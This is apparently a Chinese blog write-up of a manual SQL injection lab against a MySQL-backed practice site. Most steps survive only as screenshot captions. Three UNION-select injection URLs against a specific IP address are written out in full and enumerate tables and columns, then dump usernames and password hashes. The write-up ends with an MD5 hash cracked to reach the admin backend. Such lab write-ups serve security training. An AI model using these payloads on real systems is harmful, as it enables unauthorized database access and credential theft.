【无标题】SQL手工注入漏洞测试(MySQL数据库)

1.分析题目

第一步,点击链接,该链接可以扫描得到,这里直接告诉你

2.找注入点

【无标题】SQL手工注入漏洞测试(MySQL数据库)_第1张图片
【无标题】SQL手工注入漏洞测试(MySQL数据库)_第2张图片

3.查找系统sql表的列数和输出点

【无标题】SQL手工注入漏洞测试(MySQL数据库)_第3张图片
【无标题】SQL手工注入漏洞测试(MySQL数据库)_第4张图片
【无标题】SQL手工注入漏洞测试(MySQL数据库)_第5张图片

4.信息收集

【无标题】SQL手工注入漏洞测试(MySQL数据库)_第6张图片
【无标题】SQL手工注入漏洞测试(MySQL数据库)_第7张图片

5.进行sql注入找敏感信息

  • 找数据库
    【无标题】SQL手工注入漏洞测试(MySQL数据库)_第8张图片

  • 找表
    http://124.70.22.208:48047/new_list.php?id=-1 union select 1,group_concat(table_name) ,3 ,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'--+
    【无标题】SQL手工注入漏洞测试(MySQL数据库)_第9张图片

  • 找列
    http://124.70.22.208:48047/new_list.php?id=-1 union select 1,group_concat(column_name) ,3 ,4 from information_schema.columns where table_name= 'StormGroup_member' and table_schema = 'mozhe_Discuz_StormGroup' --+
    【无标题】SQL手工注入漏洞测试(MySQL数据库)_第10张图片

  • 得到数据
    http://124.70.22.208:48047/new_list.php?id=-1 union select 1,name ,password,4 from StormGroup_member where database()='mozhe_Discuz_StormGroup' limit 1,1--+
    【无标题】SQL手工注入漏洞测试(MySQL数据库)_第11张图片

af9d5defa1aa1abbf431b8ef2649544fMD5加密进入后台得到key

【无标题】SQL手工注入漏洞测试(MySQL数据库)_第12张图片

你可能感兴趣的:(web渗透,数据库,sql,mysql)